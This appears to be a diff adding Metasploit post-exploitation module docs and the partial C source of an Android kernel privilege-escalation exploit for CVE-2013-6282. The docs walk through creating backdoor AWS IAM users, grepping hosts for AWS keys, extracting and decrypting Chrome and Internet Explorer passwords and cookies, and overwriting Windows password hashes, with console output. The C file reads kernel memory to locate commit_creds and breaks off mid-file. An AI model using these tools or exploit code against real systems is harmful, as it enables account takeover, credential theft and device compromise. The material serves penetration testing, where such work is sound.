+If the host does not have an instance profile or the right access, the output will look like so:
+
+```
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: 3SFFML3ucP1AyP7J
+[-] User: arn:aws:sts::abcd:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::abcd:user/3SFFML3ucP1AyP7J
+[*] Creating group: 3SFFML3ucP1AyP7J
+[-] User: arn:aws:sts::abcd:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateGroup on resource: arn:aws:iam::abcd:group/3SFFML3ucP1AyP7J
+[*] Creating group policy: 3SFFML3ucP1AyP7J
+[-] User: arn:aws:sts::abcd:assumed-role/msftest/i-abacadab is not authorized to perform: iam:PutGroupPolicy on resource: group 3SFFML3ucP1AyP7J
+[*] Adding user (3SFFML3ucP1AyP7J) to group: 3SFFML3ucP1AyP7J
+[-] User: arn:aws:sts::abcd:assumed-role/msftest/i-abacadab is not authorized to perform: iam:AddUserToGroup on resource: group 3SFFML3ucP1AyP7J
+[*] Creating API Keys for 3SFFML3ucP1AyP7J
+[-] User: arn:aws:sts::abcd:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateAccessKey on resource: user 3SFFML3ucP1AyP7J
+[*] Post module execution completed
+```
+
+## Abusing API Access Keys
+
+In the case that the host we have taken over has no instance profile or does not
+have the required privileges, we can search the host for access keys with
+something like `grep -r AKIA /`. These keys may have admin privileges at which
+point you own the account, if not we may be able to escalate privileges.
+We can set `AccessKeyId`, `SecretAccessKey`, & `Token` (optional) and rerun
+the exploit to test this possibility.
+
+```
+msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
+msf post(aws_create_iam_user) > set AccessKeyId AKIAAKIAAKIAAKIAAKIA
+AccessKeyId => AKIAAKIAAKIAAKIAAKIA
+msf post(aws_create_iam_user) > set SecretAccessKey jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+SecretAccessKey => jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > run
+
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: bZWsmzyupDWxe8CT
+[*] Creating group: bZWsmzyupDWxe8CT
+[*] Creating group policy: bZWsmzyupDWxe8CT
+[*] Adding user (bZWsmzyupDWxe8CT) to group: bZWsmzyupDWxe8CT
+[*] Creating API Keys for bZWsmzyupDWxe8CT
+[*] Creating password for bZWsmzyupDWxe8CT
+AWS Account Information
+=======================
+
+UserName          GroupName         SecretAccessKey                           AccessKeyId           Password          AccountId
+--------          ---------         ---------------                           -----------           --------          ---------
+bZWsmzyupDWxe8CT  bZWsmzyupDWxe8CT  74FXOTagsYCzxz0pjPOmnsASewj4Dq/JzH3Q24qj  AKIAJ6IVXYRUQAXU625A  bZWsmzyupDWxe8CT  xxxxx
+
+[+] AWS CLI/SDK etc can be accessed by configuring with the above listed values
+[+] AWS console URL https://xxxxx.signin.aws.amazon.com/console may be used to access this account
+[+] AWS loot stored at: /Users/yyyy/.msf4/loot/20161208141050_default_172.30.0.116_AWScredentials_636339.txt
+[*] Post module execution completed
+```
+
+## Next Steps
+
+Information necessary to use the created account is printed to the screen and stored in loot:
+
+```
+$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+{
+  "UserName": "As56ekIV59OgoFOj",
+  "GroupName": "As56ekIV59OgoFOj",
+  "SecretAccessKey": "/DcYUf9veCFQF3Qcoi1eyVzptMkVTeBm5scQ9bdD",
+  "AccessKeyId": "AKIAIVNMYXYBXYE7VCHQ",
+  "Password": "As56ekIV59OgoFOj",
+  "AccountId": "xxx"
+```
+
+These creds can be used to call the AWS API directly or you can login using the console.
+
+Configuring the CLI:
+
+```
+$ aws configure --profile test
+AWS Access Key ID [None]: AKIA...
+AWS Secret Access Key [None]: THE SECRET ACCESS KEY...
+Default region name [None]: us-west-2
+Default output format [None]: json
+```
+
+Call the API, e.g., get the Account ID:
+
+```
+$ aws iam --profile test list-account-aliases
+{
+    "AccountAliases": [
+        "Account_ID"
+    ]
+}
+```
+
+Login via the console using the username and password:
+
+Go to the AWS Console at https://Account_ID.signin.aws.amazon.com/console/ and login.
@@ -0,0 +1,56 @@
+## Vulnerable Application
+
+  Any system with a `shell` or `meterpreter` session.
+
+## Verification Steps
+
+  1. Get a `shell` or `meterpreter` session on some host.
+  2. Do: ```use post/multi/gather/aws_keys```
+  3. Do: ```set SESSION [SESSION_ID]```, replacing ```[SESSION_ID]``` with the session number you wish to run this one.
+  4. Do: ```run```
+  5. If the system has readable configuration files containing AWS key material, they will be printed out.
+
+## Options
+
+  None.
+
+## Scenarios
+
+  ```
+msf post(aws_keys) > run
+
+[*] Enumerating possible user AWS config files
+[*] Looking for AWS config/credentials files in /bin
+[*] Looking for AWS config/credentials files in /dev
+[*] Looking for AWS config/credentials files in /home/syslog
+[*] Looking for AWS config/credentials files in /home/test
+[*] Looking for AWS config/credentials files in /home/test  ubuntu
+[*] Looking for AWS config/credentials files in /home/ubuntu
+[*] Looking for AWS config/credentials files in /nonexistent
+[*] Looking for AWS config/credentials files in /root
+[*] Looking for AWS config/credentials files in /usr/games
+[*] Looking for AWS config/credentials files in /usr/sbin
+[*] Looking for AWS config/credentials files in /var/backups
+[*] Looking for AWS config/credentials files in /var/cache/man
+[*] Looking for AWS config/credentials files in /var/cache/pollinate
+[*] Looking for AWS config/credentials files in /var/lib/gnats
+[*] Looking for AWS config/credentials files in /var/lib/landscape
+[*] Looking for AWS config/credentials files in /var/lib/libuuid
+[*] Looking for AWS config/credentials files in /var/list
+[*] Looking for AWS config/credentials files in /var/mail
+[*] Looking for AWS config/credentials files in /var/run/dbus
+[*] Looking for AWS config/credentials files in /var/run/ircd
+[*] Looking for AWS config/credentials files in /var/run/sshd
+[*] Looking for AWS config/credentials files in /var/spool/lpd
+[*] Looking for AWS config/credentials files in /var/spool/news
+[*] Looking for AWS config/credentials files in /var/spool/uucp
+[*] Looking for AWS config/credentials files in /var/www
+AWS Key Data
+============
+
+Source                         AWS_ACCESS_KEY_ID  AWS_SECRET_ACCESS_KEY  Profile
+------                         -----------------  ---------------------  -------
+/home/test/.aws/credentials    BAR                PRIVATE_TEST           test
+/home/ubuntu/.aws/credentials  ABC456             PRIVATE_TEST           test
+/root/.s3cfg                   root_key           root_secret            default
+```
@@ -0,0 +1,89 @@
+## Vulnerable Application
+
+  This post-exploitation module will extract saved user data from Google Chrome and attempt to decrypt sensitive information.
+  Chrome encrypts sensitive data (passwords and credit card information) which can only be decrypted with the **same** logon credentials. This module tries to decrypt the sensitive data as the current user unless told otherwise via the MIGRATE setting.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/enum_chrome`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see the extracted chrome browser data in the loot files in JSON format
+
+## Options
+
+  - **MIGRATE** - Migrate automatically to explorer.exe. This is useful if you're having SYSTEM privileges, because the process on the target system running meterpreter needs to be owned by the user the data belongs to. If activated the migration is done using the metasploit `post/windows/manage/migrate` module. The default value is false.
+
+  - **SESSION** - The session to run the module on.
+
+## Extracted data
+
+  - Web data:
+    - General autofill data
+    - Chrome users
+    - Credit card data
+  - Cookies
+  - History
+    - URL history
+    - Download history
+    - Search term history
+  - Login data (username/password)
+  - Bookmarks
+  - Preferences
+
+## Scenarios
+
+  **Meterpreter session as normal user**
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
+
+  msf exploit(handler) > use post/windows/gather/enum_chrome
+  msf post(enum_chrome) > set SESSION 1
+  SESSION => 1
+  msf post(enum_chrome) > run
+
+  [*] Impersonating token: 3156
+  [*] Running as user 'user-PC\user'...
+  [*] Extracting data for user 'user'...
+  [*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
+  [*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
+  [*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
+  [*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
+  [*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
+  [*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
+  [*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
+  [*] Post module execution completed
+  ```
+
+  **Meterpreter session as system**
+
+  In this case, you should set the MIGRATE setting to true. The module will try to migrate to explorer.exe to decrypt the encrypted data. After the decryption is done, the script will migrate back into the original process.
+
+  ```
+  [*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.104:51129) at 2016-10-13 20:45:50 +0200
+
+  msf exploit(handler) > use post/windows/gather/enum_chrome
+  msf post(enum_chrome) > set SESSION 1
+  SESSION => 1
+  msf post(enum_chrome) > set MIGRATE true
+  MIGRATE => true
+  msf post(enum_chrome) > run
+
+  [*] current PID is 1100. migrating into explorer.exe, PID=2916...
+  [*] done.
+  [*] Running as user 'user-PC\user'...
+  [*] Extracting data for user 'user'...
+  [*] Downloaded Web Data to '/home/user/.msf4/loot/20161013205236_default_192.168.1.18_chrome.raw.WebD_032796.txt'
+  [*] Downloaded Cookies to '/home/user/.msf4/loot/20161013205238_default_192.168.1.18_chrome.raw.Cooki_749912.txt'
+  [*] Downloaded History to '/home/user/.msf4/loot/20161013205244_default_192.168.1.18_chrome.raw.Histo_307144.txt'
+  [*] Downloaded Login Data to '/home/user/.msf4/loot/20161013205309_default_192.168.1.18_chrome.raw.Login_519738.txt'
+  [*] Downloaded Bookmarks to '/home/user/.msf4/loot/20161013205310_default_192.168.1.18_chrome.raw.Bookm_593102.txt'
+  [*] Downloaded Preferences to '/home/user/.msf4/loot/20161013205311_default_192.168.1.18_chrome.raw.Prefe_742084.txt'
+  [*] Decrypted data saved in: /home/user/.msf4/loot/20161013205909_default_192.168.1.18_chrome.decrypted_173440.txt
+  [*] migrating back into PID=1100...
+  [*] done.
+  [*] Post module execution completed
+  ```
@@ -0,0 +1,106 @@
+## Vulnerable Application
+
+  This post-exploitation module will extract saved user data from Internet Explorer. For IE versions of 7 and newer the module will try to extract and decrypt saved credentials as well.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get meterpreter session
+  3. Do: `use post/windows/gather/enum_ie`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see the extracted IE browser data in the loot files
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+## Extracted data
+
+  - History
+  - Cookies
+  - Autocomplete data
+  - Credentials **(only for >= IE7)**
+    - HTTP auth credentials
+    - Saved form credentials
+
+## Example Scenario
+
+  **Using the module with an earlier version than IE7 (IE6)**
+
+  In this scenario the module won't be able to extract credential data.
+
+  ```
+  msf exploit(handler) > use post/windows/gather/enum_ie
+  msf post(enum_ie) > set SESSION 1
+  SESSION => 1
+  msf post(enum_ie) > run
+
+  [*] IE Version: 6.0.2900.5512
+  [-] This module will only extract credentials for >= IE7
+  [*] Retrieving history.....
+          File: C:\Documents and Settings\user\Local Settings\History\History.IE5\index.dat
+  [*] Retrieving cookies.....
+          File: C:\Documents and Settings\user\Cookies\index.dat
+  [*] Looping through history to find autocomplete data....
+  [-] No autocomplete entries found in registry
+  [*] Looking in the Credential Store for HTTP Authentication Creds...
+  [*] Writing history to loot...
+  [*] Data saved in: /home/user/.msf4/loot/20161031155122_default_10.0.2.15_ie.history_747359.txt
+  [*] Writing cookies to loot...
+  [*] Data saved in: /home/user/.msf4/loot/20161031155122_default_10.0.2.15_ie.cookies_795069.txt
+  [*] Post module execution completed
+  ```
+
+  **Using the module with IE7+ (IE8)**
+
+  In this scenario the module will try to extract credential data, display it in the console and save it in a loot file.
+
+  ```
+  msf exploit(handler) > use post/windows/gather/enum_ie
+  msf post(enum_ie) > set SESSION 1
+  SESSION => 1
+  msf post(enum_ie) > run
+
+  [*] IE Version: 8.0.7601.17514
+  [*] Retrieving history.....
+          File: C:\Users\IEUser\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat
+          File: C:\Users\IEUser\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat
+  [*] Retrieving cookies.....
+          File: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
+          File: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat
+  [*] Looping through history to find autocomplete data....
+  [*] Looking in the Credential Store for HTTP Authentication Creds...
+  [*] Writing history to loot...
+  [*] Data saved in: /home/user/.msf4/loot/20161031201908_default_10.0.2.15_ie.history_555694.txt
+  [*] Writing cookies to loot...
+  [*] Data saved in: /home/user/.msf4/loot/20161031201908_default_10.0.2.15_ie.cookies_216987.txt
+  [*] Writing gathered credentials to loot...
+  [*] Data saved in: /home/user/.msf4/loot/20161031201908_default_10.0.2.15_ie.user.creds_355504.txt
+
+  Credential data
+  ===============
+
+   Type           Url                                     User           Pass
+   ----           ---                                     ----           ----
+   Auto Complete  https://wordpresssite.net/wp-login.php  sampleUser     P455w0rd
+   Auto Complete  https://wordpresssite.net/wp-login.php  sampleUser     P455w0rd
+
+  [*] Post module execution completed
+  ```
+
+  The extracted history data would in both scenarios for example look like this:
+
+  ```
+  History data
+  ============
+
+   Date Modified              Date Accessed              Url
+   -------------              -------------              ---
+   2011-11-20T23:59:02+00:00  2011-11-20T23:59:02+00:00  about:Home
+   2016-10-31T14:42:05+00:00  2016-10-31T14:42:05+00:00  http://go.microsoft.com/fwlink/?LinkId=54729&clcid=0x0407
+   2016-10-31T14:42:06+00:00  2016-10-31T14:42:06+00:00  http://de.msn.com/?ocid=iefvrt
+   2016-10-31T14:42:08+00:00  2016-10-31T14:42:08+00:00  http://www.microsoft.com/isapi/redir.dll?prd=ie&pver=6&ar=msnhome
+   2016-10-31T14:42:23+00:00  2016-10-31T14:42:23+00:00  http://www.msn.com/de-de?ocid=iefvrt
+   2016-10-31T14:47:42+00:00  2016-10-31T14:47:42+00:00  file:///E:/text.txt
+  ```
@@ -0,0 +1,35 @@
+## Overview
+This module changes a user's password by carving a hash in the windows registry. 
+
+1. It doesn't change the "password last changed" field
+2. You can set a hash directly, so you can change a user's password and revert it without cracking it's hash.
+3. It bypasses the password complexity requirements
+
+## Module Options
+- **USER** - This option allows you to specify the user you wish to change the password of. 
+- **PASS** - This option allows you to specify the password to be set in the form of a clear text password, a single NT hash, or a couple of LM:NT hashes.  
+
+## Module Process
+Here is the process that the module follows:
+
+- Retrieves list of users from the registry.
+- If the user is found it attempts to:
+    - load the user key from the registry
+    - check if the lm and nt hashes exit in the key
+    - replace the hashes if they exist
+    - write they user key back into the registry
+
+## Recommandations
+I would recommand to use hashdump before using the module to backup the user hashes
+Use at your own risk.
+
+## Limitations
+
+At some point, Windows 10 stopped storing users in that exact way, users whose password was set after that change would not be vulnerable. This will be updated once someone figures how the hashes are now stored.
+
+The module does not modify the user key architecture, you cannot set a hash on a user that does not have a password.
+
+## Usage
+- run post/windows/manage/hashcarve user=test pass=password
+- run post/windows/manage/hashcarve user=test pass=nthash
+- run post/windows/manage/hashcarve user=test pass=lmhash:nthash
@@ -0,0 +1,77 @@
+## Example Session
+
+/tmp/hello.cs contains the following:
+
+```
+using System;
+
+public class Hello
+{
+   public static void Main()
+   {
+      Console.WriteLine("Hello, World!");
+   }
+}
+```
+
+To build and run the code:
+
+```
+msf exploit(handler) > use post/windows/manage/powershell/build_net_code
+msf post(build_net_code) > set SESSION -1
+SESSION => -1
+msf post(build_net_code) > show options
+
+Module options (post/windows/manage/powershell/build_net_code):
+
+   Name           Current Setting                                            Required  Description
+   ----           ---------------                                            --------  -----------
+   ASSEMBLIES     mscorlib.dll, System.dll, System.Xml.dll, System.Data.dll  no        Any assemblies outside the defaults
+   CODE_PROVIDER  Microsoft.CSharp.CSharpCodeProvider                        yes       Code provider to use
+   COMPILER_OPTS  /optimize                                                  no        Options to pass to compiler
+   OUTPUT_TARGET                                                             no        Name and path of the generated binary, default random, omit extension
+   RUN_BINARY     false                                                      no        Execute the generated binary
+   SESSION        -1                                                         yes       The session to run this module on.
+   SOURCE_FILE                                                               yes       Path to source code
+
+msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
+SOURCE_FILE => /tmp/hello.cs
+msf post(build_net_code) > run
+
+[*] Building remote code.
+[+] File C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe found, 3584kb
+[+] Finished!
+[*] Post module execution completed
+msf post(build_net_code) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > shell
+Process 4840 created.
+Channel 7 created.
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+E:\metasploit-framework>C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+C:\cygwin64\tmp\aNwCFmmLzlYvPWw.exe
+Hello, World!
+```
+
+You can also run the code automatically:
+
+```
+msf exploit(handler) > use post/windows/manage/powershell/build_net_code
+msf post(build_net_code) > set SOURCE_FILE /tmp/hello.cs
+SOURCE_FILE => /tmp/hello.cs
+msf post(build_net_code) > set RUN_BINARY true
+RUN_BINARY => true
+msf post(build_net_code) > set SESSION -1
+SESSION => -1
+msf post(build_net_code) > run
+
+[*] Building remote code.
+[+] File C:\cygwin64\tmp\QuEQSEifJOe.exe found, 3584kb
+[+] Hello, World!
+
+[+] Finished!
+[*] Post module execution completed
+```
@@ -0,0 +1,48 @@
+## Overview
+This module will start a process as another user using powershell.
+By default, it will start an interactive cmd as the target user.
+
+## Module Options
+- **USER** - The use to run the program as. 
+- **PASS** - The user's password  
+- **DOMAIN** - The domain of the user
+- **EXE** - The program to run (default cmd.exe)
+- **ARGS** - The program arguments 
+- **PATH** - The path to run the program in (default C:\\)
+- **CHANNELIZE** - Channelize the output, required to read output or interact
+- **INTERACT** - Interact with program
+- **HIDDEN** - Hide the console window
+
+## Module Process
+The process will use the Start-Process command of powershell to run a process as another user.
+
+## Limitations
+- Requires Powershell
+- Hidden Mode does not work with older powershell versions
+- Interactive mode needs to be run from a meterpreter console
+
+## Examples
+
+`
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword
+
+[*] Hidden mode may not work on older powershell versions, if it fails, try HIDDEN=false
+[*] Process 1672 created.
+[*] Channel 30 created.
+Microsoft Windows [Version 10.0.14393]
+(c) 2016 Microsoft Corporation. All rights reserved.
+
+C:\\>whoami
+whoami
+my-pc\test
+
+C:\\>
+
+meterpreter > run post/windows/manage/run_as_psh user=test pass=mypassword hidden=false channelize=false interactive=false exe=cmd path=C:\\\\windows args="/c start notepad"
+
+[*] Process 9768 created.
+meterpreter > 
+
+`
@@ -0,0 +1,21 @@
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+#LOCAL_LDFLAGS   += -llog
+#LOCAL_CFLAGS    += -DDEBUG
+LOCAL_MODULE    := exploit
+LOCAL_SRC_FILES := exploit.c
+
+include $(BUILD_SHARED_LIBRARY)
+
+include $(CLEAR_VARS)
+
+LOCAL_LDFLAGS   += -llog
+LOCAL_CFLAGS    += -DDEBUG
+LOCAL_MODULE    := debugexploit
+LOCAL_SRC_FILES := exploit.c
+
+include $(BUILD_EXECUTABLE)
+
+
@@ -0,0 +1,20 @@
+
+all: install
+
+build:
+	ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-16 APP_ABI=armeabi
+
+install: build
+	mv libs/armeabi/libexploit.so ../../../../data/exploits/CVE-2013-6282.so
+
+push: build
+	adb push libs/armeabi/debugexploit /data/local/tmp/exploit
+
+run: push
+	adb shell 'chmod 777 /data/local/tmp/exploit'
+	adb shell '/data/local/tmp/exploit'
+
+clean:
+	rm -rf libs
+	rm -rf obj
+
@@ -0,0 +1,11 @@
+
+BUILDING:
+
+Download the android ndk, e.g:
+https://dl.google.com/android/repository/android-ndk-r10e-linux-x86_64.zip
+(I used android-ndk-10d)
+
+Unzip it and install ensure ndk-build is in your PATH
+
+make
+
@@ -0,0 +1,719 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdbool.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/ptrace.h>
+#include <sys/syscall.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <fcntl.h>
+#include <jni.h>
+
+unsigned char shellcode_buf[2048] = { 0x90, 0x90, 0x90, 0x90 };
+
+#define KERNEL_START_ADDRESS 0xc0008000
+#define KERNEL_SIZE 0x2000000
+#define SEARCH_START_ADDRESS 0xc0800000
+#define KALLSYMS_SIZE 0x200000
+#define PTMX_DEVICE "/dev/ptmx"
+
+#ifdef DEBUG
+#include <android/log.h>
+#define LOGV(...) __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); fflush(stdout)
+#else
+#define LOGV(...) 
+#endif
+
+unsigned long prepare_kernel_cred_address = 0;
+unsigned long commit_creds_address = 0;
+unsigned long ptmx_fops_address = 0;
+unsigned long ptmx_open_address = 0;
+unsigned long tty_init_dev_address = 0;
+unsigned long tty_release_address = 0;
+unsigned long tty_fasync_address = 0;
+unsigned long ptm_driver_address = 0;
+
+unsigned long pattern_kallsyms_addresses[] = {
+	0xc0008000,	/* stext */
+	0xc0008000,	/* _sinittext */
+	0xc0008000,	/* _stext */
+	0xc0008000	/* __init_begin */
+};
+unsigned long pattern_kallsyms_addresses2[] = {
+	0xc0008000,	/* stext */
+	0xc0008000	/* _text */
+};
+unsigned long pattern_kallsyms_addresses3[] = {
+	0xc00081c0,	/* asm_do_IRQ */
+	0xc00081c0,	/* _stext */
+	0xc00081c0	/* __exception_text_start */
+};
+unsigned long pattern_kallsyms_addresses4[] = {
+	0xc0008180,
+	0xc0008180,
+	0xc0008180
+};
+
+unsigned long *kallsymsmem = NULL;
+unsigned long kallsyms_num_syms;
+unsigned long *kallsyms_addresses;
+unsigned char *kallsyms_names;
+unsigned char *kallsyms_token_table;
+unsigned short *kallsyms_token_index;
+unsigned long *kallsyms_markers;
+
+struct cred;
+struct task_struct;
+
+struct cred *(*prepare_kernel_cred)(struct task_struct *);
+int (*commit_creds)(struct cred *);
+
+bool bChiled;
+
+int read_value_at_address(unsigned long address, unsigned long *value) {
+	int sock;
+	int ret;
+	int i;
+	unsigned long addr = address;
+	unsigned char *pval = (unsigned char *)value;
+	socklen_t optlen = 1;
+
+	*value = 0;
+	errno = 0;
+	sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
+	if (sock < 0) {
+		LOGV("socket() failed: %s.\n", strerror(errno));
+		return -1;
+	}
+
+	for (i = 0; i < sizeof(*value); i++, addr++, pval++) {
+		errno = 0;
+		ret = setsockopt(sock, SOL_IP, IP_TTL, (void *)addr, 1);
+		if (ret != 0) {
+			if (errno != EINVAL) {
+				LOGV("setsockopt() failed: %s.\n", strerror(errno));
+				close(sock);
+				*value = 0;
+				return -1;
+			}
+		}
+		errno = 0;
+		ret = getsockopt(sock, SOL_IP, IP_TTL, pval, &optlen);
+		if (ret != 0) {
+			LOGV("getsockopt() failed: %s.\n", strerror(errno));
+			close(sock);
+			*value = 0;
+			return -1;
+		}
+	}
+
+	close(sock);
+
+	return 0;
+}
+
+unsigned long *kerneldump(unsigned long startaddr, unsigned long dumpsize) {
+	unsigned long addr;
+	unsigned long val;
+	unsigned long *allocaddr;
+	unsigned long *memaddr;
+
+	LOGV("dumping kernel...\n");
+	allocaddr = (unsigned long *)malloc(dumpsize);
+	if (allocaddr == NULL) {
+		LOGV("malloc failed: %s.\n", strerror(errno));
+		return NULL;
+	}
+	memaddr = allocaddr;
+
+	for (addr = startaddr; addr < (startaddr + dumpsize); addr += 4, memaddr++) {
+		if (read_value_at_address(addr, &val) != 0) {
+			LOGV("kerneldump failed: %s.\n", strerror(errno));
+			return NULL;
+		}
+		*memaddr = val;
+	}
+
+	return allocaddr;
+}
+
+int check_pattern(unsigned long *addr, unsigned long firstval, unsigned long *pattern, int patternnum) {
+	unsigned long val;
+	unsigned long cnt;
+	unsigned long i;
+
+	if (firstval == pattern[0]) {
+		cnt = 1;
+		for (i = 1; i < patternnum; i++) {
+			read_value_at_address((unsigned long)(&addr[i]), &val);
+			if (val == pattern[i]) {
+				cnt++;
+			} else {
+				break;
+			}
+		}
+		if (cnt == patternnum) {
+			return 0;
+		}
+	}
+
+	return -1;
+}
+
+int check_kallsyms_header(unsigned long *addr) {
+	unsigned long val;
+	read_value_at_address((unsigned long)addr, &val);
+
+	if (check_pattern(addr, val, pattern_kallsyms_addresses, sizeof(pattern_kallsyms_addresses) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses2, sizeof(pattern_kallsyms_addresses2) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses3, sizeof(pattern_kallsyms_addresses3) / 4) == 0) {
+		return 0;
+	} else if (check_pattern(addr, val, pattern_kallsyms_addresses4, sizeof(pattern_kallsyms_addresses4) / 4) == 0) {
+		return 0;
+	}
+
+	return -1;
+}
+
+int get_kallsyms_addresses() {
+	unsigned long *endaddr;
+	unsigned long i, j;
+	unsigned long *addr;
+	unsigned long n;
+	unsigned long val;
+	unsigned long off;
+
+	if (read_value_at_address(KERNEL_START_ADDRESS, &val) != 0) {
+		LOGV("this device is not supported.\n");
+		return -1;
+	}
+	LOGV("search kallsyms...\n");
+	endaddr = (unsigned long *)(KERNEL_START_ADDRESS + KERNEL_SIZE);
+	for (i = 0; i < (KERNEL_START_ADDRESS + KERNEL_SIZE - SEARCH_START_ADDRESS); i += 16) {
+		for (j = 0; j < 2; j++) {
+			/* get kallsyms_addresses pointer */
+			if (j == 0) {
+				kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS + i);
+			} else {
+				if ((i == 0) || ((SEARCH_START_ADDRESS - i) < KERNEL_START_ADDRESS)) {
+					continue;
+				}
+				kallsyms_addresses = (unsigned long *)(SEARCH_START_ADDRESS - i);
+			}
+			if (check_kallsyms_header(kallsyms_addresses) != 0) {
+				continue;
+			}
+			addr = kallsyms_addresses;
+			off = 0;
+
+			/* search end of kallsyms_addresses */
+			n = 0;
+			while (1) {
+				read_value_at_address((unsigned long)addr, &val);
+				if (val < KERNEL_START_ADDRESS) {
+					break;
+				}
+				n++;
+				addr++;
+				off++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			/* skip there is filled by 0x0 */
+			while (1) {
+				read_value_at_address((unsigned long)addr, &val);
+				if (val != 0) {
+					break;
+				}
+				addr++;
+				off++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			read_value_at_address((unsigned long)addr, &val);
+			kallsyms_num_syms = val;
+			addr++;
+			off++;
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* check kallsyms_num_syms */
+			if (kallsyms_num_syms != n) {
+				continue;
+			}
+
+			LOGV("kallsyms_addresses=%08lx\n", (unsigned long)kallsyms_addresses);
+			LOGV("kallsyms_num_syms=%08lx\n", kallsyms_num_syms);
+			kallsymsmem = kerneldump((unsigned long)kallsyms_addresses, KALLSYMS_SIZE);
+			if (kallsymsmem == NULL) {
+				return -1;
+			}
+			kallsyms_addresses = kallsymsmem;
+			endaddr = (unsigned long *)((unsigned long)kallsymsmem + KALLSYMS_SIZE);
+
+			addr = &kallsymsmem[off];
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			kallsyms_names = (unsigned char *)addr;
+
+			/* search end of kallsyms_names */
+			for (i = 0, off = 0; i < kallsyms_num_syms; i++) {
+				int len = kallsyms_names[off];
+				off += len + 1;
+				if (&kallsyms_names[off] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* adjust */
+			addr = (unsigned long *)((((unsigned long)&kallsyms_names[off] - 1) | 0x3) + 1);
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+			/* but kallsyms_markers shoud be start 0x00000000 */
+			addr--;
+
+			kallsyms_markers = addr;
+
+			/* end of kallsyms_markers */
+			addr = &kallsyms_markers[((kallsyms_num_syms - 1) >> 8) + 1];
+			if (addr >= endaddr) {
+				return -1;
+			}
+
+			/* skip there is filled by 0x0 */
+			while (addr[0] == 0x00000000) {
+				addr++;
+				if (addr >= endaddr) {
+					return -1;
+				}
+			}
+
+			kallsyms_token_table = (unsigned char *)addr;
+
+			i = 0;
+			while ((kallsyms_token_table[i] != 0x00) || (kallsyms_token_table[i + 1] != 0x00)) {
+				i++;
+				if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* skip there is filled by 0x0 */
+			while (kallsyms_token_table[i] == 0x00) {
+				i++;
+				if (&kallsyms_token_table[i - 1] >= (unsigned char *)endaddr) {
+					return -1;
+				}
+			}
+
+			/* but kallsyms_markers shoud be start 0x0000 */
+			kallsyms_token_index = (unsigned short *)&kallsyms_token_table[i - 2];
+
+			return 0;
+		}
+	}
+	return -1;
+}
+
